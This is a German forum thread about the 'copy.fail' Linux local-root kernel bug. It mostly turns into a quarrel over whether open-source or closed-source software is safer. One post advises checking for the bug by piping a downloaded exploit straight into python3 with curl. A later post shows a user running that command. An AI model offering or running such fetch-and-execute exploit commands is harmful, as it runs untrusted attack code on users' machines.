copy.fail: Bug (in allen Linux Distros) erlaubt lokalen Nutzern root zu werden

[Freedstorm]

Gar keiner. Nicht umsonst ist das Projekt ja auch im Großen und Ganzen aufgegeben worden.

Nehmen wir dann das moderne systemd mit seinen 1,6 Millionen Zeilen Code? ich wüsste nicht, dass es jemals vollständig überprüft wurde. Und ich glaube auch nicht, dass man systemd das jährlich um etwa 60-80k Zeilen wächst, jemals richtig überprüfen kann. Es gibt so einige Open Source Projekte die so groß sind, dass es nahezu unmöglich ist, diese vollständig zu prüfen.

Wie gesagt, in der Theorie hat Open Source viele Vorteile. Aber bei Projekten dieser Größenordnung "mit siebenstelligen Codezeilen" ist die Offenheit ohne ein finanziertes, professionelles Audit (wie es z.B. das BSI (CAOS) beauftragt) reine Theorie.

Ein professionell gepflegtes Closed Source Produkt bei dem ein Team Vollzeit für die Sicherheit haftet, kann kurzfristig sicherer sein als eine Millionen-Zeilen Open Source Katastrophe, bei der jeder denkt.. "Irgendjemand wird schon drübergeschaut haben."

Aber wir kommen nicht weiter. Die Punkte wurden alle schon genannt.
Wenn Du argumentieren willst, bring Neues ein. Ansonsten ist es irgendwie sinnlos.

Das mag für dich vielleicht sinnlos sein, aber die User die das hier lesen, sollen sich darüber Gedanken machen, dass Open Source nicht automatisch "besser" als Closed Source bedeutet, jedenfalls nicht bei dieser Größenordnung. Bei Anwendungen wie Nextcloud, Keepass, Vaultwarden oder Jitsi usw. wurden viele kritische Lücken erst dank des BSI gefunden und behoben.

 

[andy_m4]

Nehmen wir dann das moderne systemd mit seinen 1,6 Millionen Zeilen Code? ich wüsste nicht, dass es jemals vollständig überprüft wurde.

Das kann ich nicht beantworten. Aber das war ja auch gar nicht meine Behauptung.

Es gibt so einige Open Source Projekte die so groß sind, dass es nahezu unmöglich ist, diese vollständig zu prüfen.

Ich weiß nicht, wie Du auf den vollständig-prüfen-Zug kommst und warum Du darauf herumreitest.
Nirgends wurde behauptet, das Open-Source-Software (also selbst gängige und gut finanzierte Open-Source-Software) vollständig überprüft ist.

Und so nebenbei: Auch bei Closed-Source-Software ist die Lage nicht besser (eher schlechter).

Ein professionell gepflegtes Closed Source Produkt bei dem ein Team Vollzeit für die Sicherheit haftet, kann kurzfristig sicherer sein

Kann. Allerdings sehen wir ja auch regelmäßig, das auch bei Closed-Source-Software es eklatante (Security-)Bugs gibt.
Und auch Haftung hilft Dir da wenig. Das hab ich aber auch schon erläutert. Daher hilft es wenig, wenn Du nur bereits abgefrühstückte Punkte wiederholst.

sollen sich darüber Gedanken machen, dass Open Source nicht automatisch "besser" als Closed Source bedeutet

Hab ich ja auch nicht getan. Im Gegenteil. Ich habe ja sogar Beispiele gebracht, wo Open-Source eher nicht so gut aussieht und wo Closed-Source-Software gut abschneidet.
Irgendwie hab ich das Gefühl, Du ignorierst frühere Beiträge. Da ist eine Diskussion schwierig. Ich will auch nicht ständig alles wiederholen müssen.

Bei Anwendungen wie Nextcloud, Keepass, Vaultwarden oder Jitsi usw. wurden viele kritische Lücken erst dank des BSI gefunden und behoben.

Nochmal: Nirgends hab ich behauptet, das jede Open-Source-Software ganz toll ist oder das Open-Source-Software fehlerfrei ist.

Insofern weiß ich gerade nicht, was Du von mir willst.

 

[Freedstorm]

Insofern weiß ich gerade nicht, was Du von mir willst.

Da meine Beiträge anscheinend ständig falsch bei dir ankommen, lassen wir das mit der Unterhaltung in Zukunft lieber. Du nimmst die Dinge viel zu persönlich. Musst du nicht, es ist ein öffentliches Forum, und man will damit schließlich viele erreichen.

 

[andy_m4]

Da meine Beiträge anscheinend ständig falsch bei dir ankommen, lassen wir das mit der Unterhaltung in Zukunft lieber.

Was kommt denn falsch an? Sag doch mal ein Beispiel.

Du nimmst die Dinge viel zu persönlich.

Soso.
Wie Du darauf kommst, bleibt wohl Dein Geheimnis.

 

[bluedxca93]

Wie gross ist die Gefahr wirklich? aktualisiere jjetzt mal auf den 7er mainline kernel. Das 26.04 wollte ich eigentlich schon installieren aufm rechner aber kein Geld für eine neue SSD, und 26.04 ist auch nicht voll zu allen meinen Anwendungen kompatibel in ner VM. 24.04 läuft alles was ich bruche.. Jetzt dieser Bug der bekannt wird. Argghh aber windows 11 raubt noch mehr Nerven. Hoffe der Bug ist aus dem 7er Kernel dann endlich draussen und es kommt kein neuer.

 

[frazzlerunning]

Wie gross ist die Gefahr wirklich?

Angreifer müssen User auf deinem System sein, um die Lücke nutzen zu können (direkt oder SSH).

 

[bluedxca93]

Das ist eine klare und deutliche Info. Heisst slnage ich keine neue Drittanbieter Software installiere -/ kompiliere sollte das System trotzdem stabil sein. Danke dir. Aber weil ich ja oft auch mal was aus einem ppa lade oder kompiliere, muss ich dann wohl trotzdem aktualisieren.. Immerhin ist die Gefahr dann nicht so groß wie gedacht.

 

[Habicht]

Hoffe der Bug ist aus dem 7er Kernel dann endlich draussen und es kommt kein neuer.

Das Thema sollte bei allen gängigen Distris mittlerweile eigentlich durch sein.

Kontrollieren kannst du es, indem du im Terminal mal ein

curl https://copy.fail/exp | python3 && su

eingibst und wenn da dann

Passwort: su: Fehler bei Authentifizierung
Passwort:

erscheint, dann ist alles ok.

 

[andy_m4]

Heisst slnage ich keine neue Drittanbieter Software installiere -/ kompiliere sollte das System trotzdem stabil sein.

Was heißt "keine neue"?
Mal davon abgesehen, wenn deine Drittanbieter-Software "böse" ist, dann hast Du trotzdem ein Problem. Egal ob der Bug da ist oder nicht.
Der Bug ist eigentlich vor allem da interessant, wo Du entweder Prozesse gezielt isolieren willst (weil Du ihnen nicht traust) oder wo sich User drauf tummeln (sprich: als Webspace-Betreiber willst Du natürlich nicht, das sich deine Kunden einfach so root-Rechte holen können).
Hast Du solche oder ähnliche Szenarien nicht, ist der Bug für Dich erst mal nicht so sehr relevant.

 

[bluedxca93]

@andy_m4 Appimages oder irgendein ppa oder Software die ich tetsweise kompiliere, weil sie nicht in den Paketquellen ist.
Bin wohl nicht mehr betroffen:
uname -a
Linux mate 7.0.0-070000-generic #202604122140 SMP PREEMPT_DYNAMIC Sun Apr 12 22:05:40 UTC 2026 x86_64 x86_64 x86_64 GNU/Linux
"
2026-05-06 18:17:50 (49,2 MB/s) - ‘exp’ gespeichert [731]
Passwort:
su: Legitimierungsfehler
"

 

[Snakeeater]

Denn:
So häufig ich höre, dass Open Soruce DESWEGEN sicherer wäre, eben weil der Quellcode offen verfügbar ist und jeder ihn analysieren kann, lässt den Fakt weg, dass "drüber schauen können" und "drüber schauen tun" zwei verschiedene Punkte sind.

🤦‍♂️

Atme doch mal zweimal durch, denk an was schönes und dann betrachte was du da geschrieben hast nochmal ohne Voreingenommenheit.
Ich denke jeder normal denkende Mensch wird dann schnell erkennen das dies mindestens genauso auf "closed source" Software zutrifft.

Jetzt daraus im Umkehrschluss zu argumentieren, dass closed source in welcher weise auch immer, sicherer ist...

Ergänzung (Donnerstag um 09:04)

Wobei Closed-Source da trotzdem teilweise hilfreich sein kann: MIT & Co. Lizenzen und selbst einsetzen bedeutet, dass man auch selbst 100% der Haftung übernimmt. Bei proprietärer Software, vor allem bei Cloud-Zeug, liegt die Haftung nicht selten zu großen Teilen oder gar direkt 100% beim Diensteanbieter. Das kann durchaus sehr attraktiv sein.

Gerade in puncto Datenschutz ist es in der Realität ja immer so, dass es nie 100% Sicherheit gibt...da werden Angebote, bei denen man die Haftung an Dritte abtreten kann, sehr schnell attraktiv.

Reden wir jetzt hier von irgendwelchen Tools auf Git und Co? Oder reden wir hier von Betriebssystemenen? Du willst also wirklich versuchen die Haftung bei Microsoft geltend zu machen, weil dein Betriebssystem kompromitiert wurde?

Ergänzung (Donnerstag um 09:30)

In der Theorie stimmt das, in der Praxis sieht es bei vielen Projekten wie z.B. X11 jedoch anders aus.

Man muss sich einmal die Dimensionen vor Augen führen. Z.B. das gesamte X11 Projekt schleppt gut 3-5 Millionen Zeilen Code mit sich herum. Vieles davon ist >30 Jahre altes C, hochkomplex. Wer schaut da wirklich "mal eben" drüber? Ein echtes Audit bei dieser Codemenge erfordert Ressourcen und finanzielle Mittel, die kaum ein Einzelner oder gar ein kleines Team aufbringen kann.

Es gibt etliche weitere bekannte Anwendungen, die selten bis nie ein Audit gesehen haben. Und wie sieht es nach einem Update aus? Wird man jedes Mal Geld in ein Audit investieren, das mindestens fünfstellig ausfällt?

Wieviele Linuxserver betreiben X?

Wovon reden wir hier eigentlich? Privatrechnern? Sitzt ihr alle an einer OpenBSD Maschine weil ihr Angst vor Scriptkiddies habt?

Komplett an der Realität vorbei diese Argumente.

Ergänzung (Donnerstag um 09:34)

Lenk nicht vom Thema ab.
Erstens kannst Du Deine Annahme wegen Closed Source nicht belegen - ist also reine Weltanschauung.
Zwotens: Wenn andere schlecht arbeiten ist das nie eine Entschuldigung für eigene schlechte Arbeit.

Im Prinzip lesen sich Deine Zeilen so als ob Linux für Dich Weltanschauung oder sogar Religion ist.
Damit wären wir dann an dem Punkt auch fertig.

Kann man Leute hier für solche Postings nicht direkt melden? Der Tenor ist ganz klar, Ursachenforschung wäre eher was für einen Therapeuten. Hier gehts nicht um Argumente sondern Weltanschauung, danke für die Bestätigung.

 

[mchawk777]

Kann man Leute hier für solche Postings nicht direkt melden?

Will mal so sagen: Für Dein Ad Hominem-durchtränktes Posting hättest Du Dir eine Meldung mit Fug und Recht verdient.
MCP: End of line - for good.

 

[Snakeeater]

Ein professionell gepflegtes Closed Source Produkt bei dem ein Team Vollzeit für die Sicherheit haftet, kann kurzfristig sicherer sein als eine Millionen-Zeilen Open Source Katastrophe, bei der jeder denkt.. "Irgendjemand wird schon drübergeschaut haben."

Nochmal, wovon reden wir hier? Das Thema bezog sich auf eine Lücke in Linux, der einzige "sinnvoller" Vergleich sind hier MacOS und Windows im closed source Bereich.

Das BSI als Garant für sichere Software ist ein richtig starkes Argument. /s

90% (~65% wenn man öffentliche Clouds einbezieht) der Server im Netz rennen auf Open Source. In Unternehmen geht der Anteil auf unter 45% runter, AD und Exchange sei Dank.

Jeder der auch nur Ansatzweise weiß wie eine IT Abteilung von innen aussieht weiß was die größten Einfallstore sind.

 

[tty_ghost]

Die Wahrheit ist halt, dass das Argument Open Source in der Realität was anderes ist, als was das Gefühl vermittelt. Die Erfolgreichsten Open Source Projekte sind halt alle "closed contribution" wie zb Linux, Git und SQLlite. Bevor jetzt jemand was sagt, die Hoops durch die du springen musst bevor du auch nur eine Zeile in den Mainline Source Tree comitten darfst sind einige. Ganz davon abgesehen dass es erstmal pauschal abgelehnt wird. Auch wird ja Linux inzwischen durch die großen Tech Firmen getragen. Wenn man sich ansieht wer committed sind das halt alles Programmierer die bei den bekannten Namen arbeiten.

Besonders Furchtbar, ja es ließt sich wie Satire war das Argument hier im Thread dass mit Realitätsferne argumentiert wird weil ja niemand mehr X11 verwendet und der Vorschlag dass man doch ein BSD verwenden soll. Dabei sind ja gerade die Komponenten aus dem BSD Umfeld auf Linux (zB openSSH oder die coreutils) die dadurch auffallen dass sie sicher und perfomant sind.

Viel mehr ist festzustellen dass man sich Linux Community besonders schwer damit tut Fehler zuzugeben und auch andere, da wo es sich gehört zu Loben. Man ist halt in diesem komfortablen middle spot, wo man bei Microsoft schauen kann, was funktioniert und was nicht und gleichzeitig sagen kann dass man ja nicht ultra-konservativ ist wie die BSD Projekte. Dass Docker zb super ist und nur auf Linux entstehen konnte ist ein absoluter Peak, aber dass 90% der Container als root laufen und somit auch root auf dem Host sind ist halt ein Problem. Besonders im Hinblick auf copyfail. Da muss man auch anerkennen dass IBM/Redhat mit podman die Idee genomemn hat und an den kritischen Punkten verbessert hat. Es ist nur eine Frage der Zeit (oder Willens) bis Podman Compose kommt und dann ist Docker Geschichte.

Hier ist auch Microsoft positiv hervorzuheben mit dem RDP Protokoll. Das verwende ich auch auf Linux Servern. (xrdp auf dem Server mit Remmina auf dem Client. RDP über einen SSH Tunnel. Somit nur für Admins erreichbar). Was RDP alles mehr und besser kann als VNC sind Welten.

 

[Snakeeater]

Geiler AI/Bot Account. Musste erstmal direkt googeln was Podman Compose sein soll, nennt man sowas schon Halluzinieren?

Ich wüsste nichtmal wie ein Mensch, dass was dieser Account angeblich aus meinem Post verstanden hat, tatsächlich so interpretieren könnte.

 

[tty_ghost]

 

[bluedxca93]

Was hat diese -durchaus interessante Diskussion- mit dem Copy fail bug zu tun?

 

[tty_ghost]

Leider ist festzustellen dass alle Diskussionen um schwere Fehler im Linux Umfeld so abdriften. War damals bei Heartbleed auch nicht anders. Es ist wiederholt zu beobachten dass sobald das Gefühl der Überlegenheit bröckelt die Diskussionen abdriften und -wie hier auch schon festgestellt - es nur noch um Ad Hominem geht.

 

[Snakeeater]

Es ist eher weil man irgend ein Arch auf biegen und brechen verwenden will und das halt das DE ist.

Es ist nur eine Frage der Zeit (oder Willens) bis Podman Compose kommt und dann ist Docker Geschichte.

verwende ich die KDE Konsole auf meinen Cosmic Desktop, das ist halt wirklich das beste Terminal. Weil da genau diese Flut an Optionen, das ist was man braucht um effektiv zu arbeiten.

Was auch immer du machst, ist sehr weird.

Der erste Absatz in deinem letzten Beitrag, es geht doch bei Open Source nicht darum das Tom aus der Nachbarschaft einen Patch commiten darf. Tom darf den Code gerne lesen und sonstwas damit machen. Wo ist das ein Argument für die aktuelle Diskusion?

Wo habe ich behauptet das niemand mehr X verwendet? Der Satz mit BSD war sarkastisch darauf bezogen worüber hier eigentlich argumentiert wird.

Coretuils und BSD? Was kann Linux darfür das Menschen docker container unsicher betreiben? Ist Windows daran schuld wenn du mit deinem Adminaccount arbeitest?

Ich warte immer noch auf die Erleuchtung was Podman Compose sein soll.

Das du irgendwie per RDP auf deine Linuxserver zugreifst spricht eher für dein Verständnis von arbeiten mit Linux. Ich habe ja schon angezweifelt das Linuxserver mit einer grafischen Oberfläche betrieben werden.

 

[tty_ghost]

Keine Ahnung warum jetzt, ohne Kontext und Link alte Beiträge von mir ausgegraben werden, aber gerne

---

Es ist eher weil man irgend ein Arch auf biegen und brechen verwenden will und das halt das DE ist.

Link: https://www.computerbase.de/forum/threads/was-stoert-mich-an-kde-plasma.2269915/page-3#post-31451204

KDE ist halt das beliebteste DE auf Arch, siehe https://pkgstats.archlinux.de/fun/Desktop Environments/current - Was das mit der Diskussion hier zu tun hat entzieht sich mir.

---

Es ist nur eine Frage der Zeit (oder Willens) bis Podman Compose kommt und dann ist Docker Geschichte.

Was ist daran falsch? Podman ist halt per Design besser.

• Es ist deamonless, läuft also ohne root.
  • Daher ist ein container escape sehr viel schwerer als bei Docker
  • Daher ist auch der Read/Write Zugriff auf das Host Filesystem besser gesichert
• Es generiert dir automatisch systemd Units - damit lassen sich halt services schöner steuern als mit den Instructions aus der Docker Compose

Wenn man es googelt, findet man viele Vergleiche. Einer davon ist zb https://last9.io/blog/podman-vs-docker/

Podman benutzt halt fürs "podman compose" noch die Docker Engine. Warum ist mir ein rätsel aber wenn ich Container, die unsicher gebaut sind über die Container Engine absichern kann dann mahc ich das doch.

---

verwende ich die KDE Konsole auf meinen Cosmic Desktop, das ist halt wirklich das beste Terminal. Weil da genau diese Flut an Optionen, das ist was man braucht um effektiv zu arbeiten.

Und? Es ist halt schöner einen Button zu haben anstatt einen Shortcut. Zb nutze ich gerne die Pane Splitting Funktion von der Konsole. Aber auch der copy-input finde ich super praktisch über GUI zu steuern und nicht über Shortcuts. Vorallem, irgendwann hat man so viele Programme mit so vielen Shortcuts ineinander verschachtelt, wie zb mit Tmux wo man ja auch splitten kann aber dann auf unterschiedlichen Servern die vll auch noch andere Linuxe an sich sind und daher nicht homogen ticken. Finde das halt super entspannt.

---

Wo ist das ein Argument für die aktuelle Diskusion?

Na dass der Vorteil das alle Mitmachen dürfen halt in der Realität nicht gegeben ist.

---

Wo habe ich behauptet das niemand mehr X verwendet? Der Satz mit BSD war sarkastisch darauf bezogen worüber hier eigentlich argumentiert wird.

hier:

Wieviele Linuxserver betreiben X?

Das ist halt eine rhetorische Unterstellung.

---

Coretuils und BSD? Was kann Linux darfür das Menschen docker container unsicher betreiben? Ist Windows daran schuld wenn du mit deinem Adminaccount arbeitest?

Warum wird mir eigentlich vermischung vorgeworfen.

Ja die Coreutils stammen aus den 4.4BSD. Seitdem halt gerne neu aufgesetzt, Ubuntu macht es ja gerade wieder aber der Ursprung ist hatl trozdem da.

Zu dem Docker Thematik. Es ist halt in sich nicht schlüssig, ein secure-by-default Ansatz hochzuloben und dann einen offensichtlichen und schweren Flaw in der Dockerengine zu haben.

---

Ich warte immer noch auf die Erleuchtung was Podman Compose sein soll.

Einen Container über eine Configfile zu betrieben anstatt über CLI Arguments

---

Das du irgendwie per RDP auf deine Linuxserver zugreifst spricht eher für dein Verständnis von arbeiten mit Linux. Ich habe ja schon angezweifelt das Linuxserver mit einer grafischen Oberfläche betrieben werden.

Bin gerne für Vorschläge offen. Konkretes Beispiel:

Ein Mitarbeiter aus der Videoabteilung möchte ein Restore haben.

• Das Backup liegt auf einen älteren Linux Server im cold storage.
• NFS Mount nicht möglich, Server steht im abgesicherten Netz das nur SSH aufmacht. SSHFS ist nicht perfomant genug.
• Die Videodateien sind RAW, also unkomprimiert und sehr groß
• Die Dateinamen und Metadaten unterscheiden sich an sich nur in Details die für Menschen schwer zu merken sind, also zb Datum und Uhrzeit sind fast identisch, manchmal nur Abweichungen von wenigen Sekunden
• Viele Aufnahmen wiederholen sich, weil es die gleiche Szene darstellt nur als verschiede - fast identische - Takes
• Jede Szene ist mehrmals aus verschiedenen Winkeln aufgenommen
• Details/Unterschiede im Bild kann man nur erkennen wenn man es abspielt

Ich habe jetzt den Mitarbeiter aus der Videoabteilung hinter mir stehen. Mein "Verständnis vom Arbeiten mit Linux" gefällt ihn sehr, weil ich kann die Dateien alle mit ihm durchgehen und beliebig oft hin und her springen.

Wie löse ich das mit CLI? Ich möchte hier besonders auf den dritten Punkt hinweisen. Eine Videodatei, 60 Sek. 30 FPS als 4K RAW ist ca 20Gig.